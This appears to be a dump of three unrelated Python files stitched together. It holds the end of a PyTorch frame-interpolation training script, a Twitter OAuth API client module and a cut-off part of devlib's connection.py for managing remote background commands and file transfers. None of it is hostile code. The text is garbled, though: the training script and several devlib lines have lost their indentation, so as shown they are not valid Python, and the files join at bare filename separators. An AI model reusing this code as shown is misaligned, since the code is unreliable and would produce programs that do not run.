print("Turn the model into CUDA")
model = model.cuda()
if args.SAVED_MODEL:
# args.SAVED_MODEL ='../model_weights/'+ args.SAVED_MODEL + "/best" + ".pth"
args.SAVED_MODEL = './model_weights/best.pth'
print("Fine tuning on " + args.SAVED_MODEL)
if not args.use_cuda:
pretrained_dict = torch.load(args.SAVED_MODEL, map_location=lambda storage, loc: storage)
# model.load_state_dict(torch.load(args.SAVED_MODEL, map_location=lambda storage, loc: storage))
else:
pretrained_dict = torch.load(args.SAVED_MODEL)
# model.load_state_dict(torch.load(args.SAVED_MODEL))
# print([k for k,v in pretrained_dict.items()])
model_dict = model.state_dict()
# 1. filter out unnecessary keys
pretrained_dict = {k: v for k, v in pretrained_dict.items() if k in model_dict}
# 2. overwrite entries in the existing state dict
model_dict.update(pretrained_dict)
# 3. load the new state dict
model.load_state_dict(model_dict)
pretrained_dict = None
if type(args.datasetName) == list:
train_sets, test_sets = [], []
for ii, jj in zip(args.datasetName, args.datasetPath):
tr_s, te_s = datasets.__dict__[ii](jj, split=args.dataset_split, single=args.single_output, task=args.task)
train_sets.append(tr_s)
test_sets.append(te_s)
train_set = torch.utils.data.ConcatDataset(train_sets)
test_set = torch.utils.data.ConcatDataset(test_sets)
else:
train_set, test_set = datasets.__dict__[args.datasetName](args.datasetPath)
train_loader = torch.utils.data.DataLoader(
train_set, batch_size=args.batch_size,
sampler=balancedsampler.RandomBalancedSampler(train_set, int(len(train_set) / args.batch_size)),
num_workers=args.workers, pin_memory=True if args.use_cuda else False)
val_loader = torch.utils.data.DataLoader(test_set, batch_size=args.batch_size,
num_workers=args.workers, pin_memory=True if args.use_cuda else False)
print('{} samples found, {} train samples and {} test samples '.format(len(test_set) + len(train_set),
len(train_set),
len(test_set)))
# if not args.lr == 0:
print("train the interpolation net")
optimizer = torch.optim.Adamax([
{'params': model.initScaleNets_filter.parameters(), 'lr': args.filter_lr_coe * args.lr},
{'params': model.initScaleNets_filter1.parameters(), 'lr': args.filter_lr_coe * args.lr},
{'params': model.initScaleNets_filter2.parameters(), 'lr': args.filter_lr_coe * args.lr},
{'params': model.ctxNet.parameters(), 'lr': args.ctx_lr_coe * args.lr},
{'params': model.flownets.parameters(), 'lr': args.flow_lr_coe * args.lr},
{'params': model.depthNet.parameters(), 'lr': args.depth_lr_coe * args.lr},
{'params': model.rectifyNet.parameters(), 'lr': args.rectify_lr}
],
lr=args.lr, betas=(0.9, 0.999), eps=1e-8, weight_decay=args.weight_decay)
scheduler = ReduceLROnPlateau(optimizer, 'min', factor=args.factor, patience=args.patience, verbose=True)
print("*********Start Training********")
print("LR is: " + str(float(optimizer.param_groups[0]['lr'])))
print("EPOCH is: " + str(int(len(train_set) / args.batch_size)))
print("Num of EPOCH is: " + str(args.numEpoch))
def count_network_parameters(model):
    """Return the total number of trainable parameters in *model*.

    :param model: a torch.nn.Module (anything exposing ``.parameters()``).
    :return: int -- sum of element counts of all parameters with
             ``requires_grad`` set.
    """
    # p.numel() counts elements directly (equivalent to prod(p.size()));
    # int() keeps the result a plain Python int rather than a numpy scalar.
    return sum(int(p.numel()) for p in model.parameters() if p.requires_grad)
print("Num. of model parameters is :" + str(count_network_parameters(model)))
if hasattr(model, 'flownets'):
print("Num. of flow model parameters is :" +
str(count_network_parameters(model.flownets)))
if hasattr(model, 'initScaleNets_occlusion'):
print("Num. of initScaleNets_occlusion model parameters is :" +
str(count_network_parameters(model.initScaleNets_occlusion) +
count_network_parameters(model.initScaleNets_occlusion1) +
count_network_parameters(model.initScaleNets_occlusion2)))
if hasattr(model, 'initScaleNets_filter'):
print("Num. of initScaleNets_filter model parameters is :" +
str(count_network_parameters(model.initScaleNets_filter) +
count_network_parameters(model.initScaleNets_filter1) +
count_network_parameters(model.initScaleNets_filter2)))
if hasattr(model, 'ctxNet'):
print("Num. of ctxNet model parameters is :" +
str(count_network_parameters(model.ctxNet)))
if hasattr(model, 'depthNet'):
print("Num. of depthNet model parameters is :" +
str(count_network_parameters(model.depthNet)))
if hasattr(model, 'rectifyNet'):
print("Num. of rectifyNet model parameters is :" +
str(count_network_parameters(model.rectifyNet)))
training_losses = AverageMeter()
auxiliary_data = []
saved_total_loss = 10e10
# saved_total_PSNR = -1
ikk = 0
for kk in optimizer.param_groups:
if kk['lr'] > 0:
ikk = kk
break
for t in range(args.numEpoch):
print("The id of this in-training network is " + str(args.uid))
print(args)
# Turn into training mode
model = model.train()
for i, (X0_half, X1_half, y_half) in enumerate(train_loader):
if i >= int(len(train_set) / args.batch_size):
# (0 if t == 0 else EPOCH):#
break
X0_half = X0_half.cuda() if args.use_cuda else X0_half
X1_half = X1_half.cuda() if args.use_cuda else X1_half
y_half = y_half.cuda() if args.use_cuda else y_half
X0 = Variable(X0_half, requires_grad=False)
X1 = Variable(X1_half, requires_grad=False)
y = Variable(y_half, requires_grad=False)
diffs, offsets, filters, occlusions = model(torch.stack((X0, y, X1), dim=0))
pixel_loss, offset_loss, sym_loss = part_loss(diffs, offsets, occlusions, [X0, X1], epsilon=args.epsilon)
total_loss = sum(x * y if x > 0 else 0 for x, y in zip(args.alpha, pixel_loss))
training_losses.update(total_loss.item(), args.batch_size)
if i % max(1, int(int(len(train_set) / args.batch_size) / 500.0)) == 0:
print("\t\tSaving the model...")
torch.save(model.state_dict(), args.save_path + "/checkpoint" + str(i) + ".pth")
if i % max(1, int(int(len(train_set) / args.batch_size) / 100.0)) == 0:
print("Ep [" + str(t) + "/" + str(i) +
"]\tl.r.: " + str(round(float(ikk['lr']), 7)) +
"\tPix: " + str([round(x.item(), 5) for x in pixel_loss]) +
"\tTV: " + str([round(x.item(), 4) for x in offset_loss]) +
"\tSym: " + str([round(x.item(), 4) for x in sym_loss]) +
"\tTotal: " + str([round(x.item(), 5) for x in [total_loss]]) +
"\tAvg. Loss: " + str([round(training_losses.avg, 5)]))
optimizer.zero_grad()
total_loss.backward()
optimizer.step()
if t == 1:
# delete the pre validation weights for cleaner workspace
if os.path.exists(args.save_path + "/epoch" + str(0) + ".pth"):
os.remove(args.save_path + "/epoch" + str(0) + ".pth")
if os.path.exists(args.save_path + "/epoch" + str(t - 1) + ".pth"):
os.remove(args.save_path + "/epoch" + str(t - 1) + ".pth")
torch.save(model.state_dict(), args.save_path + "/epoch" + str(t) + ".pth")
# print("\t\t**************Start Validation*****************")
# Turn into evaluation mode
val_total_losses = AverageMeter()
val_total_pixel_loss = AverageMeter()
val_total_PSNR_loss = AverageMeter()
val_total_tv_loss = AverageMeter()
val_total_pws_loss = AverageMeter()
val_total_sym_loss = AverageMeter()
for i, (X0, X1, y) in enumerate(val_loader):
if i >= int(len(test_set) / args.batch_size):
break
with torch.no_grad():
X0 = X0.cuda() if args.use_cuda else X0
X1 = X1.cuda() if args.use_cuda else X1
y = y.cuda() if args.use_cuda else y
diffs, offsets, filters, occlusions = model(torch.stack((X0, y, X1), dim=0))
pixel_loss, offset_loss, sym_loss = part_loss(diffs, offsets, occlusions, [X0, X1],
epsilon=args.epsilon)
val_total_loss = sum(x * y for x, y in zip(args.alpha, pixel_loss))
per_sample_pix_error = torch.mean(torch.mean(torch.mean(diffs[args.save_which] ** 2,
dim=1), dim=1), dim=1)
per_sample_pix_error = per_sample_pix_error.data # extract tensor
psnr_loss = torch.mean(20 * torch.log(1.0 / torch.sqrt(per_sample_pix_error))) / torch.log(
torch.Tensor([10]))
#
val_total_losses.update(val_total_loss.item(), args.batch_size)
val_total_pixel_loss.update(pixel_loss[args.save_which].item(), args.batch_size)
val_total_tv_loss.update(offset_loss[0].item(), args.batch_size)
val_total_sym_loss.update(sym_loss[0].item(), args.batch_size)
val_total_PSNR_loss.update(psnr_loss[0], args.batch_size)
print(".", end='', flush=True)
print("\nEpoch " + str(int(t)) +
"\tlearning rate: " + str(float(ikk['lr'])) +
"\tAvg Training Loss: " + str(round(training_losses.avg, 5)) +
"\tValidate Loss: " + str([round(float(val_total_losses.avg), 5)]) +
"\tValidate PSNR: " + str([round(float(val_total_PSNR_loss.avg), 5)]) +
"\tPixel Loss: " + str([round(float(val_total_pixel_loss.avg), 5)]) +
"\tTV Loss: " + str([round(float(val_total_tv_loss.avg), 4)]) +
"\tPWS Loss: " + str([round(float(val_total_pws_loss.avg), 4)]) +
"\tSym Loss: " + str([round(float(val_total_sym_loss.avg), 4)])
)
auxiliary_data.append([t, float(ikk['lr']),
training_losses.avg, val_total_losses.avg, val_total_pixel_loss.avg,
val_total_tv_loss.avg, val_total_pws_loss.avg, val_total_sym_loss.avg])
numpy.savetxt(args.log, numpy.array(auxiliary_data), fmt='%.8f', delimiter=',')
training_losses.reset()
print("\t\tFinished an epoch, Check and Save the model weights")
# we check the validation loss instead of training loss. OK~
if saved_total_loss >= val_total_losses.avg:
saved_total_loss = val_total_losses.avg
torch.save(model.state_dict(), args.save_path + "/best" + ".pth")
print("\t\tBest Weights updated for decreased validation loss\n")
else:
print("\t\tWeights Not updated for undecreased validation loss\n")
# schedule the learning rate
scheduler.step(val_total_losses.avg)
print("*********Finish Training********")
if __name__ == '__main__':
    # Training recursively detaches gradients, which can blow the default
    # interpreter/thread stack (0xC00000FD on Windows). Raise the Python
    # recursion limit and run train() in a worker thread created AFTER
    # enlarging the thread stack size (stack_size only affects new threads).
    sys.setrecursionlimit(100000)  # 0xC00000FD exception for the recursive detach of gradients.
    threading.stack_size(200000000)  # 0xC00000FD exception for the recursive detach of gradients.
    thread = threading.Thread(target=train)
    thread.start()
    thread.join()
    exit(0)
|
utils.py | u"""twitter apiを叩くクライアントを提供する."""
import json
import os
import threading
import datetime
from pytz import timezone
from queue import Queue
from requests_oauthlib import OAuth1Session
# from django.core.paginator import Paginator
def merge_two_dicts(a, b):
    """Merge two dicts into a new dict; values from *b* win on key clashes."""
    merged = dict(a)
    merged.update(b)
    return merged
class TwitterClient:
    """Thin client for the Twitter REST API, authenticated via OAuth1."""

    def __init__(self, user=None):
        """
        Build a client from the consumer key and an access token.

        Uses the logged-in user's tokens when *user* is provided (a dict
        holding 'oauth_token' and 'oauth_token_secret'); otherwise falls back
        to the administrator tokens taken from the environment.

        Fix: the default is now ``None`` instead of a shared mutable ``{}``
        (passing ``{}`` explicitly still behaves identically).
        """
        if not user:
            self.AT = os.environ['tw_at']
            self.AS = os.environ['tw_as']
        else:
            self.AT = user['oauth_token']
            self.AS = user['oauth_token_secret']
        self.CK = os.environ['tw_ck']
        self.CS = os.environ['tw_cs']
        self.session = OAuth1Session(self.CK, self.CS, self.AT, self.AS)
        self.urls = {
            'timeline':
            'https://api.twitter.com/1.1/statuses/home_timeline.json',
            'favlist': 'https://api.twitter.com/1.1/favorites/list.json',
            'user': 'https://api.twitter.com/1.1/users/show.json',
            'oembed': 'https://publish.twitter.com/oembed',
            'request_token': 'https://twitter.com/oauth/request_token',
            'access_token': 'https://twitter.com/oauth/access_token',
            'authorize': 'https://twitter.com/oauth/authorize',
            'account_verified':
            'https://api.twitter.com/1.1/account/verify_credentials.json',
            'tweet': 'https://api.twitter.com/1.1/statuses/show.json',
        }

    def timeline(self):
        """Return the authenticated user's home timeline.

        :raises Exception: when the API answers with a non-200 status.
        """
        res = self.session.get(self.urls['timeline'], params={})
        if res.status_code != 200:
            raise Exception()
        return json.loads(res.text)

    def favlist(self, user_id, page=1, count=100):
        """Return the target user's likes ("favourites").

        :param user_id: numeric user id.
        :param page: 1-based result page.
        :param count: tweets per page.
        :raises Exception: when the API answers with a non-200 status.
        """
        params = {
            'user_id': user_id,
            'count': count,
            'page': page,
        }
        res = self.session.get(self.urls['favlist'], params=params)
        if res.status_code != 200:
            raise Exception()
        return json.loads(res.text)

    def user_from_screen_name(self, screen_name):
        """Return the user object for an @screen_name.

        :raises Exception: when the API answers with a non-200 status.
        """
        params = {
            'screen_name': screen_name,
        }
        res = self.session.get(self.urls['user'], params=params)
        if res.status_code != 200:
            raise Exception()
        return json.loads(res.text)

    def show_tweets(self, tweets):
        """Print the text of each tweet in *tweets*."""
        for item in tweets:
            print(item['text'])

    def show_user(self, user):
        """Print a short summary of a user object."""
        print('User ID: {}'.format(user['id_str']))
        print('Screen Name: {}'.format(user['screen_name']))
        print('Name: {}'.format(user['name']))

    def user_id_from_screen_name(self, screen_name):
        """Return the id_str for an @screen_name.

        :raises Exception: when the lookup fails for any reason.
        """
        try:
            user = self.user_from_screen_name(screen_name)
        except Exception:
            # Normalize any lookup failure (HTTP, network, JSON) to the
            # generic Exception callers already expect.
            raise Exception()
        return user['id_str']

    def html_embedded(self, tweet, q):
        """Fetch the Twitter-widget HTML for *tweet* and put it on queue *q*.

        Always puts exactly one item on *q* ({} for protected accounts, ''
        on API failure) so a consumer's blocking get() can never deadlock.
        """
        # Protected accounts cannot be embedded.
        if tweet['user']['protected']:
            q.put({})
            return
        url = 'https://twitter.com/{screen_name}/status/{tweet_id}'.format(
            screen_name=tweet['user']['screen_name'], tweet_id=tweet['id_str'])
        params = {
            'url': url,
            'maxwidth': 300,
        }
        res = self.session.get(self.urls['oembed'], params=params)
        if res.status_code != 200:
            # BUG FIX: previously this returned '' without feeding the queue,
            # leaving add_htmls_embedded() blocked forever on q.get().
            q.put('')
            return
        q.put(json.loads(res.text)['html'])

    def add_htmls_embedded(self, tweets):
        """Return *tweets* (minus protected ones) with 'html_embedded' added.

        The oEmbed lookups run concurrently, one thread per tweet.
        """
        threads = []
        queues = []
        for tweet in tweets:
            q = Queue()
            queues.append(q)
            th = threading.Thread(target=self.html_embedded, args=(tweet, q))
            th.start()
            threads.append(th)
        tweets_add = []
        for th, q, tweet in zip(threads, queues, tweets):
            th.join()
            if tweet['user']['protected']:
                continue
            tweet_add = merge_two_dicts(tweet, {'html_embedded': q.get()})
            tweets_add.append(tweet_add)
        return tweets_add

    def tweet_from_id(self, tweet_id):
        """Return the tweet object for a tweet id.

        :raises Exception: when the API answers with a non-200 status.
        """
        params = {
            'id': tweet_id,
        }
        res = self.session.get(self.urls['tweet'], params=params)
        if res.status_code != 200:
            raise Exception()
        return json.loads(res.text)
def is_pc(request):
    """Classify the request as PC (True) or mobile (False) via its User-Agent."""
    from user_agents import parse

    agent = parse(request.META['HTTP_USER_AGENT'])
    return not agent.is_mobile
def ignore_exceptions(func, items):
    """Apply *func* to every item concurrently; return only successful results.

    :param func: one-argument callable applied to each item.
    :param items: iterable of arguments (one worker thread per item).
    :return: list of results whose call did not raise, in input order.
    """
    def carry_out(func, item, q):
        """Run a single call, pushing the result (or None on failure) to *q*."""
        try:
            q.put(func(item))
        except Exception:
            # None is the failure sentinel filtered out below.
            q.put(None)
    threads = []
    queues = []
    for item in items:
        q = Queue()
        queues.append(q)
        th = threading.Thread(target=carry_out, args=(func, item, q))
        th.start()
        threads.append(th)
    result = []
    for th, q in zip(threads, queues):
        th.join()
        res = q.get()
        # 'is not None' (not truthiness) so valid falsy results such as 0 or
        # '' are kept; only the failure sentinel is dropped. The stray debug
        # print(len(items)) was also removed.
        if res is not None:
            result.append(res)
    return result
def parse_datetime(string):
    """Parse a Twitter-style UTC timestamp into an Asia/Tokyo aware datetime.

    :param string: e.g. 'Wed Oct 10 20:19:24 +0000 2018'.
    :return: timezone-aware datetime converted to Asia/Tokyo.

    BUG FIX: the previous format ('... +0000 ...') matched the offset as a
    literal, producing a NAIVE datetime which astimezone() then interpreted
    as *local* time. Parsing the offset with %z anchors the value to UTC
    before converting.
    """
    dt = datetime.datetime.strptime(string, '%a %b %d %H:%M:%S %z %Y')
    return dt.astimezone(timezone('Asia/Tokyo'))
if __name__ == '__main__':
    # Ad-hoc manual smoke test: fetch a known user's likes and print the
    # first tweet's favourite count. The commented lines are kept as usage
    # examples of the other client APIs.
    user_id = '1212759744'
    screen_name = 'kemomimi_oukoku'
    twitter = TwitterClient()
    # user = twitter.user_from_screen_name(screen_name)
    # user_id = user['id_str']
    # twitter.show_user(user)
    # tweets = twitter.timeline()
    tweets = twitter.favlist(user_id)
    # twitter.show_tweets(tweets)
    # tweets = twitter.add_htmls_embedded(tweets)
    print(tweets[0]["favorite_count"])
    # print(twitter.issue_request_url())
|
connection.py | # Copyright 2019 ARM Limited
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from abc import ABC, abstractmethod
from contextlib import contextmanager
from datetime import datetime
from functools import partial
from weakref import WeakSet
from shlex import quote
from time import monotonic
import os
import signal
import socket
import subprocess
import threading
import time
import logging
from devlib.utils.misc import InitCheckpoint
_KILL_TIMEOUT = 3
def _kill_pgid_cmd(pgid, sig):
return 'kill -{} -{}'.format(sig.value, pgid)
class ConnectionBase(InitCheckpoint):
    """
    Base class for all connections.

    Tracks the background commands spawned through the connection and
    guarantees :meth:`_close` runs at most once, even when :meth:`close` is
    called concurrently from several threads.
    """
    def __init__(self):
        # Weak references only: a background command no longer referenced
        # elsewhere must not be kept alive just so it can be cancelled.
        self._current_bg_cmds = WeakSet()
        self._closed = False
        self._close_lock = threading.Lock()
        # Path to busybox on the target; populated later by users of the
        # connection (None until then).
        self.busybox = None

    def cancel_running_command(self):
        # Snapshot the WeakSet so entries dying mid-iteration cannot break it.
        bg_cmds = set(self._current_bg_cmds)
        for bg_cmd in bg_cmds:
            bg_cmd.cancel()

    @abstractmethod
    def _close(self):
        """
        Close the connection.

        The public :meth:`close` method makes sure that :meth:`_close` will
        only be called once, and will serialize accesses to it if it happens to
        be called from multiple threads at once.
        """

    def close(self):
        # Locking the closing allows any thread to safely call close() as long
        # as the connection can be closed from a thread that is not the one it
        # started its life in.
        with self._close_lock:
            if not self._closed:
                self._close()
                self._closed = True

    # Ideally, that should not be relied upon but that will improve the chances
    # of the connection being properly cleaned up when it's not in use anymore.
    def __del__(self):
        # Since __del__ will be called if an exception is raised in __init__
        # (e.g. we cannot connect), we only run close() when we are sure
        # __init__ has completed successfully.
        # NOTE(review): 'initialized' appears to be provided by InitCheckpoint
        # — confirm in devlib.utils.misc.
        if self.initialized:
            self.close()
class BackgroundCommand(ABC):
    """
    Allows managing a running background command using a subset of the
    :class:`subprocess.Popen` API.

    Instances of this class can be used as context managers, with the same
    semantic as :class:`subprocess.Popen` (i.e. :meth:`close` on exit).
    """
    @abstractmethod
    def send_signal(self, sig):
        """
        Send a POSIX signal to the background command's process group ID
        (PGID).

        :param sig: Signal to send.
        :type sig: signal.Signals
        """

    def kill(self):
        """
        Send SIGKILL to the background command.
        """
        self.send_signal(signal.SIGKILL)

    def cancel(self, kill_timeout=_KILL_TIMEOUT):
        """
        Try to gracefully terminate the process by sending ``SIGTERM``, then
        waiting for ``kill_timeout`` seconds before sending ``SIGKILL``.
        """
        # Only attempt cancellation while the command is still running.
        if self.poll() is None:
            self._cancel(kill_timeout=kill_timeout)

    @abstractmethod
    def _cancel(self, kill_timeout):
        """
        Method to override in subclasses to implement :meth:`cancel`.
        """
        pass

    @abstractmethod
    def wait(self):
        """
        Block until the background command completes, and return its exit code.
        """

    @abstractmethod
    def poll(self):
        """
        Return exit code if the command has exited, None otherwise.
        """

    @property
    @abstractmethod
    def stdin(self):
        """
        File-like object connected to the background's command stdin.
        """

    @property
    @abstractmethod
    def stdout(self):
        """
        File-like object connected to the background's command stdout.
        """

    @property
    @abstractmethod
    def stderr(self):
        """
        File-like object connected to the background's command stderr.
        """

    @property
    @abstractmethod
    def pid(self):
        """
        Process Group ID (PGID) of the background command.

        Since the command is usually wrapped in shell processes for IO
        redirections, sudo etc, the PID cannot be assumed to be the actual PID
        of the command passed by the user. It is guaranteed to be a PGID
        instead, which means signals sent to it as such will target all
        subprocesses involved in executing that command.
        """

    @abstractmethod
    def close(self):
        """
        Close all opened streams and then wait for command completion.

        :returns: Exit code of the command.

        .. note:: If the command is writing to its stdout/stderr, it might be
            blocked on that and die when the streams are closed.
        """

    def __enter__(self):
        return self

    def __exit__(self, *args, **kwargs):
        self.close()
class PopenBackgroundCommand(BackgroundCommand):
    """
    :class:`subprocess.Popen`-based background command.

    Thin adapter exposing the :class:`BackgroundCommand` interface on top of
    an already-started local :class:`subprocess.Popen` object.
    """
    def __init__(self, popen):
        self.popen = popen

    def send_signal(self, sig):
        # The command's pid is a PGID (see base class): signal the whole group.
        return os.killpg(self.popen.pid, sig)

    @property
    def stdin(self):
        return self.popen.stdin

    @property
    def stdout(self):
        return self.popen.stdout

    @property
    def stderr(self):
        return self.popen.stderr

    @property
    def pid(self):
        return self.popen.pid

    def wait(self):
        return self.popen.wait()

    def poll(self):
        return self.popen.poll()

    def _cancel(self, kill_timeout):
        proc = self.popen
        # Ask politely first ...
        os.killpg(os.getpgid(proc.pid), signal.SIGTERM)
        try:
            proc.wait(timeout=kill_timeout)
        except subprocess.TimeoutExpired:
            # ... then force it.
            os.killpg(os.getpgid(proc.pid), signal.SIGKILL)

    def close(self):
        # Popen.__exit__ closes the streams and reaps the process.
        self.popen.__exit__(None, None, None)
        return self.popen.returncode

    def __enter__(self):
        self.popen.__enter__()
        return self

    def __exit__(self, *args, **kwargs):
        self.popen.__exit__(*args, **kwargs)
class ParamikoBackgroundCommand(BackgroundCommand):
    """
    :mod:`paramiko`-based background command.

    The command runs on the remote host; signals are delivered by executing
    ``kill`` over the connection rather than locally.
    """
    def __init__(self, conn, chan, pid, as_root, stdin, stdout, stderr, redirect_thread):
        # SSH channel the remote command is running on.
        self.chan = chan
        # Whether signals must be sent with root privileges.
        self.as_root = as_root
        self.conn = conn
        self._pid = pid
        self._stdin = stdin
        self._stdout = stdout
        self._stderr = stderr
        # Thread pumping the channel's output into the stdout/stderr streams.
        self.redirect_thread = redirect_thread

    def send_signal(self, sig):
        # If the command has already completed, we don't want to send a signal
        # to another process that might have gotten that PID in the meantime.
        if self.poll() is not None:
            return
        # Use -PGID to target a process group rather than just the process
        # itself
        cmd = _kill_pgid_cmd(self.pid, sig)
        self.conn.execute(cmd, as_root=self.as_root)

    @property
    def pid(self):
        # NOTE: despite the name this is a PGID, see the base class docs.
        return self._pid

    def wait(self):
        # Blocks until the remote command exits.
        return self.chan.recv_exit_status()

    def poll(self):
        # recv_exit_status() does not block once the status is ready.
        if self.chan.exit_status_ready():
            return self.wait()
        else:
            return None

    def _cancel(self, kill_timeout):
        self.send_signal(signal.SIGTERM)
        # Check if the command terminated quickly
        time.sleep(10e-3)
        # Otherwise wait for the full timeout and kill it
        if self.poll() is None:
            time.sleep(kill_timeout)
            self.send_signal(signal.SIGKILL)
            self.wait()

    @property
    def stdin(self):
        return self._stdin

    @property
    def stdout(self):
        return self._stdout

    @property
    def stderr(self):
        return self._stderr

    def close(self):
        # Close the streams first: a command blocked writing to them can then
        # terminate, letting wait() below return (see base class note).
        for x in (self.stdin, self.stdout, self.stderr):
            if x is not None:
                x.close()
        exit_code = self.wait()
        # Wait for the output-redirection thread to drain before reporting.
        thread = self.redirect_thread
        if thread:
            thread.join()
        return exit_code
class AdbBackgroundCommand(BackgroundCommand):
    """
    ``adb``-based background command.

    The command itself runs on the Android target; only its I/O goes through
    the local ``adb`` Popen object, so signals are delivered by executing
    ``kill`` on the target through the connection.
    """
    def __init__(self, conn, adb_popen, pid, as_root):
        self.conn = conn
        self.as_root = as_root
        self.adb_popen = adb_popen
        self._pid = pid

    def send_signal(self, sig):
        # Deliver the signal on the target, addressed to the process group.
        kill_cmd = _kill_pgid_cmd(self.pid, sig)
        self.conn.execute(kill_cmd, as_root=self.as_root)

    @property
    def stdin(self):
        return self.adb_popen.stdin

    @property
    def stdout(self):
        return self.adb_popen.stdout

    @property
    def stderr(self):
        return self.adb_popen.stderr

    @property
    def pid(self):
        return self._pid

    def wait(self):
        return self.adb_popen.wait()

    def poll(self):
        return self.adb_popen.poll()

    def _cancel(self, kill_timeout):
        # Graceful stop on the target first ...
        self.send_signal(signal.SIGTERM)
        try:
            self.adb_popen.wait(timeout=kill_timeout)
        except subprocess.TimeoutExpired:
            # ... then force both the remote command and the local adb proxy.
            self.send_signal(signal.SIGKILL)
            self.adb_popen.kill()

    def close(self):
        self.adb_popen.__exit__(None, None, None)
        return self.adb_popen.returncode

    def __enter__(self):
        self.adb_popen.__enter__()
        return self

    def __exit__(self, *args, **kwargs):
        self.adb_popen.__exit__(*args, **kwargs)
class TransferManagerBase(ABC):
    """
    Monitors a file push/pull in a background thread and cancels it when it
    stalls (no progress between two polls) or exceeds a total timeout.

    Subclasses implement :meth:`isactive` (progress detection) and
    :meth:`_cancel` (how to abort the underlying transfer).
    """

    def _pull_dest_size(self, dest):
        """Return the current size in bytes of the local pull destination.

        Directories are summed recursively. A destination that does not exist
        yet reports 0 — the monitor thread may poll before the transfer has
        created it. (Fix: the trailing ``return 0`` was previously
        unreachable and a missing destination raised OSError from os.stat.)
        """
        if os.path.isdir(dest):
            return sum(
                os.stat(os.path.join(dirpath, f)).st_size
                for dirpath, _, fnames in os.walk(dest)
                for f in fnames
            )
        elif os.path.exists(dest):
            return os.stat(dest).st_size
        return 0

    def _push_dest_size(self, dest):
        """Return the size of the remote push destination via busybox 'du -s'."""
        cmd = '{} du -s {}'.format(quote(self.conn.busybox), quote(dest))
        out = self.conn.execute(cmd)
        try:
            return int(out.split()[0])
        except (ValueError, IndexError):
            # Unparsable or empty output (e.g. dest not created yet): report
            # no progress instead of crashing the monitor thread.
            return 0

    def __init__(self, conn, poll_period, start_transfer_poll_delay, total_timeout):
        """
        :param conn: connection the transfer runs over.
        :param poll_period: seconds between two activity polls.
        :param start_transfer_poll_delay: grace period before the first poll.
        :param total_timeout: hard limit on the whole transfer, in seconds.
        """
        self.conn = conn
        self.poll_period = poll_period
        self.total_timeout = total_timeout
        self.start_transfer_poll_delay = start_transfer_poll_delay
        self.logger = logging.getLogger('FileTransfer')
        self.managing = threading.Event()
        self.transfer_started = threading.Event()
        self.transfer_completed = threading.Event()
        self.transfer_aborted = threading.Event()
        self.monitor_thread = None
        self.sources = None
        self.dest = None
        self.direction = None

    @abstractmethod
    def _cancel(self):
        """Abort the underlying transfer (implemented by subclasses)."""
        pass

    def cancel(self, reason=None):
        """Abort the transfer, setting ``transfer_aborted`` for the caller."""
        msg = 'Cancelling file transfer {} -> {}'.format(self.sources, self.dest)
        if reason is not None:
            msg += ' due to \'{}\''.format(reason)
        self.logger.warning(msg)
        self.transfer_aborted.set()
        self._cancel()

    @abstractmethod
    def isactive(self):
        """Return True when the transfer made progress since the last poll."""
        pass

    @contextmanager
    def manage(self, sources, dest, direction):
        """Run the stall/timeout monitor around the enclosed transfer.

        :param direction: 'push' or 'pull'.
        """
        self.sources, self.dest, self.direction = sources, dest, direction
        # Created before the try block so the finally clause can always
        # reference it (fix: m_thread could previously be unbound there).
        m_thread = threading.Thread(target=self._monitor)
        try:
            self.transfer_completed.clear()
            self.transfer_aborted.clear()
            self.transfer_started.set()
            m_thread.start()
            yield self
        except BaseException:
            self.cancel(reason='exception during transfer')
            raise
        finally:
            # Wake the monitor and wait for it before resetting the events.
            self.transfer_completed.set()
            self.transfer_started.set()
            if m_thread.ident is not None:  # join only if it was started
                m_thread.join()
            self.transfer_started.clear()
            self.transfer_completed.clear()
            self.transfer_aborted.clear()

    def _monitor(self):
        """Poll :meth:`isactive` until completion, cancelling on stall/timeout."""
        start_t = monotonic()
        # Give the transfer some time to actually start before the first poll.
        self.transfer_completed.wait(self.start_transfer_poll_delay)
        while not self.transfer_completed.wait(self.poll_period):
            if not self.isactive():
                self.cancel(reason='transfer inactive')
            elif monotonic() - start_t > self.total_timeout:
                self.cancel(reason='transfer timed out')
class PopenTransferManager(TransferManagerBase):
    """
    Transfer manager for local Popen-driven transfers: progress is measured
    by comparing the destination size between two consecutive polls.
    """
    def __init__(self, conn, poll_period=30, start_transfer_poll_delay=30, total_timeout=3600):
        super().__init__(conn, poll_period, start_transfer_poll_delay, total_timeout)
        self.transfer = None
        self.last_sample = None

    def _cancel(self):
        if self.transfer:
            self.transfer.cancel()
            self.transfer = None
            self.last_sample = None

    def isactive(self):
        # Active == destination grew since the previous size sample.
        if self.direction == 'push':
            size_fn = self._push_dest_size
        else:
            size_fn = self._pull_dest_size
        curr_size = size_fn(self.dest)
        self.logger.debug('Polled file transfer, destination size {}'.format(curr_size))
        if self.last_sample is None:
            # First poll: assume progress rather than cancelling immediately.
            active = True
        else:
            active = curr_size > self.last_sample
        self.last_sample = curr_size
        return active

    def set_transfer_and_wait(self, popen_bg_cmd):
        """Register the background transfer command and block on it,
        translating failures into CalledProcessError / TimeoutError."""
        self.transfer = popen_bg_cmd
        self.last_sample = None
        ret = self.transfer.wait()
        if ret and not self.transfer_aborted.is_set():
            raise subprocess.CalledProcessError(ret, self.transfer.popen.args)
        elif self.transfer_aborted.is_set():
            raise TimeoutError(self.transfer.popen.args)
class SSHTransferManager(TransferManagerBase):
    """
    Transfer manager for paramiko SFTP/SCP transfers: progress is detected
    through the client's progress callback rather than by sizing the
    destination.
    """
    def __init__(self, conn, poll_period=30, start_transfer_poll_delay=30, total_timeout=3600):
        super().__init__(conn, poll_period, start_transfer_poll_delay, total_timeout)
        self.transferer = None
        # Set by progress_cb, consumed (and cleared) by each isactive() poll.
        self.progressed = False
        self.transferred = None
        self.to_transfer = None

    def _cancel(self):
        # Closing the SFTP/SCP client aborts the transfer; this surfaces as a
        # socket.error inside manage(), where it is turned into TimeoutError.
        self.transferer.close()

    def isactive(self):
        progressed = self.progressed
        self.progressed = False
        msg = 'Polled transfer: {}% [{}B/{}B]'
        # NOTE(review): assumes progress_cb has run at least once before the
        # first poll (self.to_transfer would be None/0 otherwise) — confirm.
